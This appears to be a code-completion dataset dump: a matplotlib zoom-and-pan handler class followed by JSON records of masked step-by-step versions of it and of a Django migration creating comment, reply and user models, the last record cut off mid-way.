self._curr_ylim = self.axes.get_ylim()
# Mouse action callback IDs
self._cb_mouse_wheel_id = None
self._cb_mouse_button_id = None
self._cb_mouse_release_id = None
self._cb_mouse_motion_id = None
self._connect_cb()
def __del__(self):
self._disconnect_cb()
self._axes = None
@property
def axes(self):
return self._axes
@property
def scale_factor(self):
return self._scale_factor
@property
def mouse_button(self):
return self._mouse_button
def apply_transforms(self):
"""
Applies the zoom and pan transforms to the axes. Useful after reseting
the plot.
"""
self.axes.set_xlim(self._curr_xlim)
self.axes.set_ylim(self._curr_ylim)
def set_base_transforms(self):
"""
Queries the current axis limits and stores them.
"""
self._curr_xlim = self.axes.get_xlim()
self._curr_ylim = self.axes.get_ylim()
# Private methods
def _cb_mouse_wheel(self, event):
if event.inaxes:
curr_xlim = self.axes.get_xlim()
curr_ylim = self.axes.get_ylim()
xdata = event.xdata
ydata = event.ydata
xmin = xdata - curr_xlim[0]
ymin = ydata - curr_ylim[0]
xmax = curr_xlim[1] - xdata
ymax = curr_ylim[1] - ydata
xlim = ylim = []
if event.button == 'up': # zoom-in
xlim = [xdata - xmin / self.scale_factor,
xdata + xmax / self.scale_factor]
ylim = [ydata - ymin / self.scale_factor,
ydata + ymax / self.scale_factor]
elif event.button == 'down': # zoom-out
xlim = [xdata - xmin * self.scale_factor,
xdata + xmax * self.scale_factor]
ylim = [ydata - ymin * self.scale_factor,
ydata + ymax * self.scale_factor]
self._curr_xlim = xlim
self._curr_ylim = ylim
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.axes.figure.canvas.draw()
def _cb_mouse_button(self, event):
if not event.inaxes or event.button != self.mouse_button:
return
self._press_coords = (event.xdata, event.ydata)
def _cb_mouse_release(self, event):
self._press_coords = None
self.axes.figure.canvas.draw()
def _cb_mouse_motion(self, event):
if not event.inaxes or not self._press_coords:
return
xlim = self.axes.get_xlim()
ylim = self.axes.get_ylim()
xlim -= (event.xdata - self._press_coords[0])
ylim -= (event.ydata - self._press_coords[1])
self._curr_xlim = xlim
self._curr_ylim = ylim
self.axes.set_xlim(xlim)
self.axes.set_ylim(ylim)
self.axes.figure.canvas.draw()
def _connect_cb(self):
fig = self.axes.figure
self._cb_mouse_wheel_id = fig.canvas.mpl_connect(
'scroll_event', self._cb_mouse_wheel)
self._cb_mouse_button_id = fig.canvas.mpl_connect(
'button_press_event', self._cb_mouse_button)
self._cb_mouse_release_id = fig.canvas.mpl_connect(
'button_release_event', self._cb_mouse_release)
self._cb_mouse_motion_id = fig.canvas.mpl_connect(
'motion_notify_event', self._cb_mouse_motion)
def _disconnect_cb(self):
fig = self.axes.figure
if self._cb_mouse_wheel_id:
fig.canvas.mpl_disconnect(self._cb_mouse_wheel_id)
self._cb_mouse_wheel_id = None
if self._cb_mouse_button_id:
fig.canvas.mpl_disconnect(self._cb_mouse_button_id)
self._cb_mouse_button_id = None
if self._cb_mouse_release_id:
fig.canvas.mpl_disconnect(self._cb_mouse_release_id)
self._cb_mouse_release_id = None
if self._cb_mouse_motion_id:
fig.canvas.mpl_disconnect(self._cb_mouse_motion_id)
self._cb_mouse_motion_id = None
def main():
import matplotlib.pyplot as plt
fig = plt.figure()
axes = fig.add_subplot(111)
axes.scatter(x=np.arange(0, 10, 0.5), y=np.arange(
0, 20, 1), color='r', marker='o')
hand = ZoomPanHandler(axes, scale_factor=1.5)
plt.show()
if __name__ == '__main__':
main()
|
flexible
|
{
"blob_id": "6afcb8f17f7436f0ae9fa3a8c2a195245a9801f1",
"index": 6533,
"step-1": "<mask token>\n\n\nclass ZoomPanHandler:\n <mask token>\n\n def __init__(self, axes, scale_factor=2, mouse_button=2):\n \"\"\"\n Default constructor for the ZoomPanHandler class.\n\n Parameters\n axes: matplotlib.backend_bases.Axes\n The axes to attach this handler to.\n scale_factor: number\n The scale factor to apply when zooming.\n mouse_button: number or string\n The mouse button used to activate the pan action. Default value is\n 2, meaning the middle mouse button.\n \"\"\"\n self._axes = axes\n self._scale_factor = scale_factor\n self._mouse_button = mouse_button\n self._press_coords = None\n self._curr_xlim = self.axes.get_xlim()\n self._curr_ylim = self.axes.get_ylim()\n self._cb_mouse_wheel_id = None\n self._cb_mouse_button_id = None\n self._cb_mouse_release_id = None\n self._cb_mouse_motion_id = None\n self._connect_cb()\n\n def __del__(self):\n self._disconnect_cb()\n self._axes = None\n\n @property\n def axes(self):\n return self._axes\n\n @property\n def scale_factor(self):\n return self._scale_factor\n\n @property\n def mouse_button(self):\n return self._mouse_button\n\n def apply_transforms(self):\n \"\"\"\n Applies the zoom and pan transforms to the axes. Useful after reseting\n the plot.\n \"\"\"\n self.axes.set_xlim(self._curr_xlim)\n self.axes.set_ylim(self._curr_ylim)\n\n def set_base_transforms(self):\n \"\"\"\n Queries the current axis limits and stores them.\n \"\"\"\n self._curr_xlim = self.axes.get_xlim()\n self._curr_ylim = self.axes.get_ylim()\n\n def _cb_mouse_wheel(self, event):\n if event.inaxes:\n curr_xlim = self.axes.get_xlim()\n curr_ylim = self.axes.get_ylim()\n xdata = event.xdata\n ydata = event.ydata\n xmin = xdata - curr_xlim[0]\n ymin = ydata - curr_ylim[0]\n xmax = curr_xlim[1] - xdata\n ymax = curr_ylim[1] - ydata\n xlim = ylim = []\n if event.button == 'up':\n xlim = [xdata - xmin / self.scale_factor, xdata + xmax /\n self.scale_factor]\n ylim = [ydata - ymin / self.scale_factor, ydata + ymax /\n self.scale_factor]\n elif event.button == 'down':\n xlim = [xdata - xmin * self.scale_factor, xdata + xmax *\n self.scale_factor]\n ylim = [ydata - ymin * self.scale_factor, ydata + ymax *\n self.scale_factor]\n self._curr_xlim = xlim\n self._curr_ylim = ylim\n self.axes.set_xlim(xlim)\n self.axes.set_ylim(ylim)\n self.axes.figure.canvas.draw()\n\n def _cb_mouse_button(self, event):\n if not event.inaxes or event.button != self.mouse_button:\n return\n self._press_coords = event.xdata, event.ydata\n\n def _cb_mouse_release(self, event):\n self._press_coords = None\n self.axes.figure.canvas.draw()\n\n def _cb_mouse_motion(self, event):\n if not event.inaxes or not self._press_coords:\n return\n xlim = self.axes.get_xlim()\n ylim = self.axes.get_ylim()\n xlim -= event.xdata - self._press_coords[0]\n ylim -= event.ydata - self._press_coords[1]\n self._curr_xlim = xlim\n self._curr_ylim = ylim\n self.axes.set_xlim(xlim)\n self.axes.set_ylim(ylim)\n self.axes.figure.canvas.draw()\n <mask token>\n\n def _disconnect_cb(self):\n fig = self.axes.figure\n if self._cb_mouse_wheel_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_wheel_id)\n self._cb_mouse_wheel_id = None\n if self._cb_mouse_button_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_button_id)\n self._cb_mouse_button_id = None\n if self._cb_mouse_release_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_release_id)\n self._cb_mouse_release_id = None\n if self._cb_mouse_motion_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_motion_id)\n self._cb_mouse_motion_id = None\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ZoomPanHandler:\n <mask token>\n\n def __init__(self, axes, scale_factor=2, mouse_button=2):\n \"\"\"\n Default constructor for the ZoomPanHandler class.\n\n Parameters\n axes: matplotlib.backend_bases.Axes\n The axes to attach this handler to.\n scale_factor: number\n The scale factor to apply when zooming.\n mouse_button: number or string\n The mouse button used to activate the pan action. Default value is\n 2, meaning the middle mouse button.\n \"\"\"\n self._axes = axes\n self._scale_factor = scale_factor\n self._mouse_button = mouse_button\n self._press_coords = None\n self._curr_xlim = self.axes.get_xlim()\n self._curr_ylim = self.axes.get_ylim()\n self._cb_mouse_wheel_id = None\n self._cb_mouse_button_id = None\n self._cb_mouse_release_id = None\n self._cb_mouse_motion_id = None\n self._connect_cb()\n\n def __del__(self):\n self._disconnect_cb()\n self._axes = None\n\n @property\n def axes(self):\n return self._axes\n\n @property\n def scale_factor(self):\n return self._scale_factor\n\n @property\n def mouse_button(self):\n return self._mouse_button\n\n def apply_transforms(self):\n \"\"\"\n Applies the zoom and pan transforms to the axes. Useful after reseting\n the plot.\n \"\"\"\n self.axes.set_xlim(self._curr_xlim)\n self.axes.set_ylim(self._curr_ylim)\n\n def set_base_transforms(self):\n \"\"\"\n Queries the current axis limits and stores them.\n \"\"\"\n self._curr_xlim = self.axes.get_xlim()\n self._curr_ylim = self.axes.get_ylim()\n\n def _cb_mouse_wheel(self, event):\n if event.inaxes:\n curr_xlim = self.axes.get_xlim()\n curr_ylim = self.axes.get_ylim()\n xdata = event.xdata\n ydata = event.ydata\n xmin = xdata - curr_xlim[0]\n ymin = ydata - curr_ylim[0]\n xmax = curr_xlim[1] - xdata\n ymax = curr_ylim[1] - ydata\n xlim = ylim = []\n if event.button == 'up':\n xlim = [xdata - xmin / self.scale_factor, xdata + xmax /\n self.scale_factor]\n ylim = [ydata - ymin / self.scale_factor, ydata + ymax /\n self.scale_factor]\n elif event.button == 'down':\n xlim = [xdata - xmin * self.scale_factor, xdata + xmax *\n self.scale_factor]\n ylim = [ydata - ymin * self.scale_factor, ydata + ymax *\n self.scale_factor]\n self._curr_xlim = xlim\n self._curr_ylim = ylim\n self.axes.set_xlim(xlim)\n self.axes.set_ylim(ylim)\n self.axes.figure.canvas.draw()\n\n def _cb_mouse_button(self, event):\n if not event.inaxes or event.button != self.mouse_button:\n return\n self._press_coords = event.xdata, event.ydata\n\n def _cb_mouse_release(self, event):\n self._press_coords = None\n self.axes.figure.canvas.draw()\n\n def _cb_mouse_motion(self, event):\n if not event.inaxes or not self._press_coords:\n return\n xlim = self.axes.get_xlim()\n ylim = self.axes.get_ylim()\n xlim -= event.xdata - self._press_coords[0]\n ylim -= event.ydata - self._press_coords[1]\n self._curr_xlim = xlim\n self._curr_ylim = ylim\n self.axes.set_xlim(xlim)\n self.axes.set_ylim(ylim)\n self.axes.figure.canvas.draw()\n\n def _connect_cb(self):\n fig = self.axes.figure\n self._cb_mouse_wheel_id = fig.canvas.mpl_connect('scroll_event',\n self._cb_mouse_wheel)\n self._cb_mouse_button_id = fig.canvas.mpl_connect('button_press_event',\n self._cb_mouse_button)\n self._cb_mouse_release_id = fig.canvas.mpl_connect(\n 'button_release_event', self._cb_mouse_release)\n self._cb_mouse_motion_id = fig.canvas.mpl_connect('motion_notify_event'\n , self._cb_mouse_motion)\n\n def _disconnect_cb(self):\n fig = self.axes.figure\n if self._cb_mouse_wheel_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_wheel_id)\n self._cb_mouse_wheel_id = None\n if self._cb_mouse_button_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_button_id)\n self._cb_mouse_button_id = None\n if self._cb_mouse_release_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_release_id)\n self._cb_mouse_release_id = None\n if self._cb_mouse_motion_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_motion_id)\n self._cb_mouse_motion_id = None\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ZoomPanHandler:\n \"\"\"\n Matplotlib callback class to handle pan and zoom events.\n \"\"\"\n\n def __init__(self, axes, scale_factor=2, mouse_button=2):\n \"\"\"\n Default constructor for the ZoomPanHandler class.\n\n Parameters\n axes: matplotlib.backend_bases.Axes\n The axes to attach this handler to.\n scale_factor: number\n The scale factor to apply when zooming.\n mouse_button: number or string\n The mouse button used to activate the pan action. Default value is\n 2, meaning the middle mouse button.\n \"\"\"\n self._axes = axes\n self._scale_factor = scale_factor\n self._mouse_button = mouse_button\n self._press_coords = None\n self._curr_xlim = self.axes.get_xlim()\n self._curr_ylim = self.axes.get_ylim()\n self._cb_mouse_wheel_id = None\n self._cb_mouse_button_id = None\n self._cb_mouse_release_id = None\n self._cb_mouse_motion_id = None\n self._connect_cb()\n\n def __del__(self):\n self._disconnect_cb()\n self._axes = None\n\n @property\n def axes(self):\n return self._axes\n\n @property\n def scale_factor(self):\n return self._scale_factor\n\n @property\n def mouse_button(self):\n return self._mouse_button\n\n def apply_transforms(self):\n \"\"\"\n Applies the zoom and pan transforms to the axes. Useful after reseting\n the plot.\n \"\"\"\n self.axes.set_xlim(self._curr_xlim)\n self.axes.set_ylim(self._curr_ylim)\n\n def set_base_transforms(self):\n \"\"\"\n Queries the current axis limits and stores them.\n \"\"\"\n self._curr_xlim = self.axes.get_xlim()\n self._curr_ylim = self.axes.get_ylim()\n\n def _cb_mouse_wheel(self, event):\n if event.inaxes:\n curr_xlim = self.axes.get_xlim()\n curr_ylim = self.axes.get_ylim()\n xdata = event.xdata\n ydata = event.ydata\n xmin = xdata - curr_xlim[0]\n ymin = ydata - curr_ylim[0]\n xmax = curr_xlim[1] - xdata\n ymax = curr_ylim[1] - ydata\n xlim = ylim = []\n if event.button == 'up':\n xlim = [xdata - xmin / self.scale_factor, xdata + xmax /\n self.scale_factor]\n ylim = [ydata - ymin / self.scale_factor, ydata + ymax /\n self.scale_factor]\n elif event.button == 'down':\n xlim = [xdata - xmin * self.scale_factor, xdata + xmax *\n self.scale_factor]\n ylim = [ydata - ymin * self.scale_factor, ydata + ymax *\n self.scale_factor]\n self._curr_xlim = xlim\n self._curr_ylim = ylim\n self.axes.set_xlim(xlim)\n self.axes.set_ylim(ylim)\n self.axes.figure.canvas.draw()\n\n def _cb_mouse_button(self, event):\n if not event.inaxes or event.button != self.mouse_button:\n return\n self._press_coords = event.xdata, event.ydata\n\n def _cb_mouse_release(self, event):\n self._press_coords = None\n self.axes.figure.canvas.draw()\n\n def _cb_mouse_motion(self, event):\n if not event.inaxes or not self._press_coords:\n return\n xlim = self.axes.get_xlim()\n ylim = self.axes.get_ylim()\n xlim -= event.xdata - self._press_coords[0]\n ylim -= event.ydata - self._press_coords[1]\n self._curr_xlim = xlim\n self._curr_ylim = ylim\n self.axes.set_xlim(xlim)\n self.axes.set_ylim(ylim)\n self.axes.figure.canvas.draw()\n\n def _connect_cb(self):\n fig = self.axes.figure\n self._cb_mouse_wheel_id = fig.canvas.mpl_connect('scroll_event',\n self._cb_mouse_wheel)\n self._cb_mouse_button_id = fig.canvas.mpl_connect('button_press_event',\n self._cb_mouse_button)\n self._cb_mouse_release_id = fig.canvas.mpl_connect(\n 'button_release_event', self._cb_mouse_release)\n self._cb_mouse_motion_id = fig.canvas.mpl_connect('motion_notify_event'\n , self._cb_mouse_motion)\n\n def _disconnect_cb(self):\n fig = self.axes.figure\n if self._cb_mouse_wheel_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_wheel_id)\n self._cb_mouse_wheel_id = None\n if self._cb_mouse_button_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_button_id)\n self._cb_mouse_button_id = None\n if self._cb_mouse_release_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_release_id)\n self._cb_mouse_release_id = None\n if self._cb_mouse_motion_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_motion_id)\n self._cb_mouse_motion_id = None\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass ZoomPanHandler:\n \"\"\"\n Matplotlib callback class to handle pan and zoom events.\n \"\"\"\n\n def __init__(self, axes, scale_factor=2, mouse_button=2):\n \"\"\"\n Default constructor for the ZoomPanHandler class.\n\n Parameters\n axes: matplotlib.backend_bases.Axes\n The axes to attach this handler to.\n scale_factor: number\n The scale factor to apply when zooming.\n mouse_button: number or string\n The mouse button used to activate the pan action. Default value is\n 2, meaning the middle mouse button.\n \"\"\"\n self._axes = axes\n self._scale_factor = scale_factor\n self._mouse_button = mouse_button\n self._press_coords = None\n self._curr_xlim = self.axes.get_xlim()\n self._curr_ylim = self.axes.get_ylim()\n self._cb_mouse_wheel_id = None\n self._cb_mouse_button_id = None\n self._cb_mouse_release_id = None\n self._cb_mouse_motion_id = None\n self._connect_cb()\n\n def __del__(self):\n self._disconnect_cb()\n self._axes = None\n\n @property\n def axes(self):\n return self._axes\n\n @property\n def scale_factor(self):\n return self._scale_factor\n\n @property\n def mouse_button(self):\n return self._mouse_button\n\n def apply_transforms(self):\n \"\"\"\n Applies the zoom and pan transforms to the axes. Useful after reseting\n the plot.\n \"\"\"\n self.axes.set_xlim(self._curr_xlim)\n self.axes.set_ylim(self._curr_ylim)\n\n def set_base_transforms(self):\n \"\"\"\n Queries the current axis limits and stores them.\n \"\"\"\n self._curr_xlim = self.axes.get_xlim()\n self._curr_ylim = self.axes.get_ylim()\n\n def _cb_mouse_wheel(self, event):\n if event.inaxes:\n curr_xlim = self.axes.get_xlim()\n curr_ylim = self.axes.get_ylim()\n xdata = event.xdata\n ydata = event.ydata\n xmin = xdata - curr_xlim[0]\n ymin = ydata - curr_ylim[0]\n xmax = curr_xlim[1] - xdata\n ymax = curr_ylim[1] - ydata\n xlim = ylim = []\n if event.button == 'up':\n xlim = [xdata - xmin / self.scale_factor, xdata + xmax /\n self.scale_factor]\n ylim = [ydata - ymin / self.scale_factor, ydata + ymax /\n self.scale_factor]\n elif event.button == 'down':\n xlim = [xdata - xmin * self.scale_factor, xdata + xmax *\n self.scale_factor]\n ylim = [ydata - ymin * self.scale_factor, ydata + ymax *\n self.scale_factor]\n self._curr_xlim = xlim\n self._curr_ylim = ylim\n self.axes.set_xlim(xlim)\n self.axes.set_ylim(ylim)\n self.axes.figure.canvas.draw()\n\n def _cb_mouse_button(self, event):\n if not event.inaxes or event.button != self.mouse_button:\n return\n self._press_coords = event.xdata, event.ydata\n\n def _cb_mouse_release(self, event):\n self._press_coords = None\n self.axes.figure.canvas.draw()\n\n def _cb_mouse_motion(self, event):\n if not event.inaxes or not self._press_coords:\n return\n xlim = self.axes.get_xlim()\n ylim = self.axes.get_ylim()\n xlim -= event.xdata - self._press_coords[0]\n ylim -= event.ydata - self._press_coords[1]\n self._curr_xlim = xlim\n self._curr_ylim = ylim\n self.axes.set_xlim(xlim)\n self.axes.set_ylim(ylim)\n self.axes.figure.canvas.draw()\n\n def _connect_cb(self):\n fig = self.axes.figure\n self._cb_mouse_wheel_id = fig.canvas.mpl_connect('scroll_event',\n self._cb_mouse_wheel)\n self._cb_mouse_button_id = fig.canvas.mpl_connect('button_press_event',\n self._cb_mouse_button)\n self._cb_mouse_release_id = fig.canvas.mpl_connect(\n 'button_release_event', self._cb_mouse_release)\n self._cb_mouse_motion_id = fig.canvas.mpl_connect('motion_notify_event'\n , self._cb_mouse_motion)\n\n def _disconnect_cb(self):\n fig = self.axes.figure\n if self._cb_mouse_wheel_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_wheel_id)\n self._cb_mouse_wheel_id = None\n if self._cb_mouse_button_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_button_id)\n self._cb_mouse_button_id = None\n if self._cb_mouse_release_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_release_id)\n self._cb_mouse_release_id = None\n if self._cb_mouse_motion_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_motion_id)\n self._cb_mouse_motion_id = None\n\n\ndef main():\n import matplotlib.pyplot as plt\n fig = plt.figure()\n axes = fig.add_subplot(111)\n axes.scatter(x=np.arange(0, 10, 0.5), y=np.arange(0, 20, 1), color='r',\n marker='o')\n hand = ZoomPanHandler(axes, scale_factor=1.5)\n plt.show()\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport numpy as np\n\n\nclass ZoomPanHandler:\n \"\"\"\n Matplotlib callback class to handle pan and zoom events.\n \"\"\"\n\n def __init__(self, axes, scale_factor=2, mouse_button=2):\n \"\"\"\n Default constructor for the ZoomPanHandler class.\n\n Parameters\n axes: matplotlib.backend_bases.Axes\n The axes to attach this handler to.\n scale_factor: number\n The scale factor to apply when zooming.\n mouse_button: number or string\n The mouse button used to activate the pan action. Default value is\n 2, meaning the middle mouse button.\n \"\"\"\n self._axes = axes\n self._scale_factor = scale_factor\n self._mouse_button = mouse_button\n\n self._press_coords = None\n self._curr_xlim = self.axes.get_xlim()\n self._curr_ylim = self.axes.get_ylim()\n\n # Mouse action callback IDs\n self._cb_mouse_wheel_id = None\n self._cb_mouse_button_id = None\n self._cb_mouse_release_id = None\n self._cb_mouse_motion_id = None\n\n self._connect_cb()\n\n def __del__(self):\n self._disconnect_cb()\n self._axes = None\n\n @property\n def axes(self):\n return self._axes\n\n @property\n def scale_factor(self):\n return self._scale_factor\n\n @property\n def mouse_button(self):\n return self._mouse_button\n\n def apply_transforms(self):\n \"\"\"\n Applies the zoom and pan transforms to the axes. Useful after reseting\n the plot.\n \"\"\"\n self.axes.set_xlim(self._curr_xlim)\n self.axes.set_ylim(self._curr_ylim)\n\n def set_base_transforms(self):\n \"\"\"\n Queries the current axis limits and stores them.\n \"\"\"\n self._curr_xlim = self.axes.get_xlim()\n self._curr_ylim = self.axes.get_ylim()\n\n # Private methods\n def _cb_mouse_wheel(self, event):\n if event.inaxes:\n curr_xlim = self.axes.get_xlim()\n curr_ylim = self.axes.get_ylim()\n\n xdata = event.xdata\n ydata = event.ydata\n\n xmin = xdata - curr_xlim[0]\n ymin = ydata - curr_ylim[0]\n\n xmax = curr_xlim[1] - xdata\n ymax = curr_ylim[1] - ydata\n\n xlim = ylim = []\n\n if event.button == 'up': # zoom-in\n xlim = [xdata - xmin / self.scale_factor,\n xdata + xmax / self.scale_factor]\n ylim = [ydata - ymin / self.scale_factor,\n ydata + ymax / self.scale_factor]\n elif event.button == 'down': # zoom-out\n xlim = [xdata - xmin * self.scale_factor,\n xdata + xmax * self.scale_factor]\n ylim = [ydata - ymin * self.scale_factor,\n ydata + ymax * self.scale_factor]\n\n self._curr_xlim = xlim\n self._curr_ylim = ylim\n\n self.axes.set_xlim(xlim)\n self.axes.set_ylim(ylim)\n\n self.axes.figure.canvas.draw()\n\n def _cb_mouse_button(self, event):\n if not event.inaxes or event.button != self.mouse_button:\n return\n self._press_coords = (event.xdata, event.ydata)\n\n def _cb_mouse_release(self, event):\n self._press_coords = None\n self.axes.figure.canvas.draw()\n\n def _cb_mouse_motion(self, event):\n if not event.inaxes or not self._press_coords:\n return\n xlim = self.axes.get_xlim()\n ylim = self.axes.get_ylim()\n xlim -= (event.xdata - self._press_coords[0])\n ylim -= (event.ydata - self._press_coords[1])\n self._curr_xlim = xlim\n self._curr_ylim = ylim\n self.axes.set_xlim(xlim)\n self.axes.set_ylim(ylim)\n self.axes.figure.canvas.draw()\n\n def _connect_cb(self):\n fig = self.axes.figure\n self._cb_mouse_wheel_id = fig.canvas.mpl_connect(\n 'scroll_event', self._cb_mouse_wheel)\n self._cb_mouse_button_id = fig.canvas.mpl_connect(\n 'button_press_event', self._cb_mouse_button)\n self._cb_mouse_release_id = fig.canvas.mpl_connect(\n 'button_release_event', self._cb_mouse_release)\n self._cb_mouse_motion_id = fig.canvas.mpl_connect(\n 'motion_notify_event', self._cb_mouse_motion)\n\n def _disconnect_cb(self):\n fig = self.axes.figure\n if self._cb_mouse_wheel_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_wheel_id)\n self._cb_mouse_wheel_id = None\n if self._cb_mouse_button_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_button_id)\n self._cb_mouse_button_id = None\n if self._cb_mouse_release_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_release_id)\n self._cb_mouse_release_id = None\n if self._cb_mouse_motion_id:\n fig.canvas.mpl_disconnect(self._cb_mouse_motion_id)\n self._cb_mouse_motion_id = None\n\n\ndef main():\n import matplotlib.pyplot as plt\n fig = plt.figure()\n axes = fig.add_subplot(111)\n axes.scatter(x=np.arange(0, 10, 0.5), y=np.arange(\n 0, 20, 1), color='r', marker='o')\n hand = ZoomPanHandler(axes, scale_factor=1.5)\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
13,
14,
15,
16,
19
]
}
|
[
13,
14,
15,
16,
19
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('PleniApp', '0006_auto_20181203_1144')]
operations = [migrations.CreateModel(name='Comment', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('body', models.TextField()), ('date',
models.DateTimeField(auto_now_add=True))]), migrations.CreateModel(
name='Reply', fields=[('id', models.AutoField(auto_created=True,
primary_key=True, serialize=False, verbose_name='ID')), ('body',
models.TextField()), ('date', models.DateTimeField(auto_now_add=
True)), ('comment', models.ForeignKey(on_delete=django.db.models.
deletion.CASCADE, to='PleniApp.Comment'))]), migrations.CreateModel
(name='User', fields=[('id', models.AutoField(auto_created=True,
primary_key=True, serialize=False, verbose_name='ID')), ('username',
models.CharField(max_length=50)), ('password', models.CharField(
max_length=50)), ('user_type', models.CharField(default='regular',
max_length=20))]), migrations.AddField(model_name='comment', name=
'user', field=models.ForeignKey(on_delete=django.db.models.deletion
.CASCADE, to='PleniApp.User'))]
<|reserved_special_token_1|>
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [('PleniApp', '0006_auto_20181203_1144')]
operations = [migrations.CreateModel(name='Comment', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('body', models.TextField()), ('date',
models.DateTimeField(auto_now_add=True))]), migrations.CreateModel(
name='Reply', fields=[('id', models.AutoField(auto_created=True,
primary_key=True, serialize=False, verbose_name='ID')), ('body',
models.TextField()), ('date', models.DateTimeField(auto_now_add=
True)), ('comment', models.ForeignKey(on_delete=django.db.models.
deletion.CASCADE, to='PleniApp.Comment'))]), migrations.CreateModel
(name='User', fields=[('id', models.AutoField(auto_created=True,
primary_key=True, serialize=False, verbose_name='ID')), ('username',
models.CharField(max_length=50)), ('password', models.CharField(
max_length=50)), ('user_type', models.CharField(default='regular',
max_length=20))]), migrations.AddField(model_name='comment', name=
'user', field=models.ForeignKey(on_delete=django.db.models.deletion
.CASCADE, to='PleniApp.User'))]
<|reserved_special_token_1|>
# Generated by Django 2.1 on 2018-12-05 00:02
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('PleniApp', '0006_auto_20181203_1144'),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('body', models.TextField()),
('date', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Reply',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('body', models.TextField()),
('date', models.DateTimeField(auto_now_add=True)),
('comment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='PleniApp.Comment')),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=50)),
('password', models.CharField(max_length=50)),
('user_type', models.CharField(default='regular', max_length=20)),
],
),
migrations.AddField(
model_name='comment',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='PleniApp.User'),
),
]
|
flexible
|
{
"blob_id": "ccb6973910dba5897f6a12be23c74a35e848313b",
"index": 4005,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('PleniApp', '0006_auto_20181203_1144')]\n operations = [migrations.CreateModel(name='Comment', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('body', models.TextField()), ('date',\n models.DateTimeField(auto_now_add=True))]), migrations.CreateModel(\n name='Reply', fields=[('id', models.AutoField(auto_created=True,\n primary_key=True, serialize=False, verbose_name='ID')), ('body',\n models.TextField()), ('date', models.DateTimeField(auto_now_add=\n True)), ('comment', models.ForeignKey(on_delete=django.db.models.\n deletion.CASCADE, to='PleniApp.Comment'))]), migrations.CreateModel\n (name='User', fields=[('id', models.AutoField(auto_created=True,\n primary_key=True, serialize=False, verbose_name='ID')), ('username',\n models.CharField(max_length=50)), ('password', models.CharField(\n max_length=50)), ('user_type', models.CharField(default='regular',\n max_length=20))]), migrations.AddField(model_name='comment', name=\n 'user', field=models.ForeignKey(on_delete=django.db.models.deletion\n .CASCADE, to='PleniApp.User'))]\n",
"step-4": "from django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [('PleniApp', '0006_auto_20181203_1144')]\n operations = [migrations.CreateModel(name='Comment', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('body', models.TextField()), ('date',\n models.DateTimeField(auto_now_add=True))]), migrations.CreateModel(\n name='Reply', fields=[('id', models.AutoField(auto_created=True,\n primary_key=True, serialize=False, verbose_name='ID')), ('body',\n models.TextField()), ('date', models.DateTimeField(auto_now_add=\n True)), ('comment', models.ForeignKey(on_delete=django.db.models.\n deletion.CASCADE, to='PleniApp.Comment'))]), migrations.CreateModel\n (name='User', fields=[('id', models.AutoField(auto_created=True,\n primary_key=True, serialize=False, verbose_name='ID')), ('username',\n models.CharField(max_length=50)), ('password', models.CharField(\n max_length=50)), ('user_type', models.CharField(default='regular',\n max_length=20))]), migrations.AddField(model_name='comment', name=\n 'user', field=models.ForeignKey(on_delete=django.db.models.deletion\n .CASCADE, to='PleniApp.User'))]\n",
